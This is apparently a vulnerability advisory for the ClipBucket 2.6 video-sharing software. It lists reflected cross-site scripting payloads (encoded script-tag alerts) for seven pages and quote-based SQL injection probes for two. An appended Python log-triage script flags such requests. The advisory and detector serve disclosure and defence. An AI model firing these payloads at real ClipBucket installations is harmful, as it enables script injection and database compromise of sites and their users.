Title: Multiple Vulnerability on ClipBucket 2.6
Author: YaDoY666
Developer website: http://yadoy666.serverisdown.org
Program: Clip Bucket (Open Source Video Sharing)
Affected version: 2.6

Cross Site Scripting
====================
[[=]] http://www.2cto.com/[path]/channels.php
[[=]] http://www.2cto.com/[path]/collections.php
[[=]] http://www.2cto.com/[path]/groups.php
[[=]] http://www.2cto.com/[path]/search_result.php
[[=]] http://www.2cto.com/[path]/videos.php
[[=]] http://www.2cto.com/[path]/view_collection.php
[[=]] http://www.2cto.com/[path]/view_item.php

Examples:
http://www.2cto.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.2cto.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.2cto.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.2cto.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
http://www.2cto.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.2cto.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
http://www.2cto.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E

SQL Injection
==============
[[=]] http://www.2cto.com/[path]/channels.php
[[=]] http://www.2cto.com/[path]/videos.php

Test examples:
http://www.2cto.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
http://www.2cto.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
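
A log-triage check for the scripts and parameters listed above, as an added example that is not part of the original advisory or of ClipBucket's code: it flags requests whose affected parameter decodes to a quote or angle bracket, the characters both test patterns rely on. The log lines, the /cb/ install path and the character set are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> parameters the advisory reports as affected.
AFFECTED = {
    "channels.php": {"cat", "time"},
    "collections.php": {"cat"},
    "groups.php": {"cat"},
    "search_result.php": {"query"},
    "videos.php": {"cat", "time"},
    "view_collection.php": {"type"},
    "view_item.php": {"type"},
}
# Assumed triage rule: quotes and angle brackets in an affected parameter.
SUSPICIOUS = re.compile(r"""['"<>]""")
# Request target inside a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return sorted affected parameter names whose decoded value matches SUSPICIOUS."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qs(parts.query, keep_blank_values=True)
    return sorted(
        name for name in AFFECTED.get(script, ())
        if any(SUSPICIOUS.search(v) for v in params.get(name, []))
    )

def scan(log_lines):
    """Return [(line_number, [parameter, ...])] for log lines worth reviewing."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        found = suspicious_params(m.group(1)) if m else []
        if found:
            hits.append((n, found))
    return hits

# Constructed sample log lines (not from the page); /cb/ is an assumed install path.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cb/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=all_time HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cb/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /cb/view_collection.php?cid=9&type=%3Cb%3E HTTP/1.1" 200 4100',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /cb/index.php?q=%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, params in scan(SAMPLE_LOG):
        print(f"line {n}: check parameter(s) {', '.join(params)}")
```

A hit is a reason to review the request, not proof of exploitation; an apostrophe in a legitimate search query will also match.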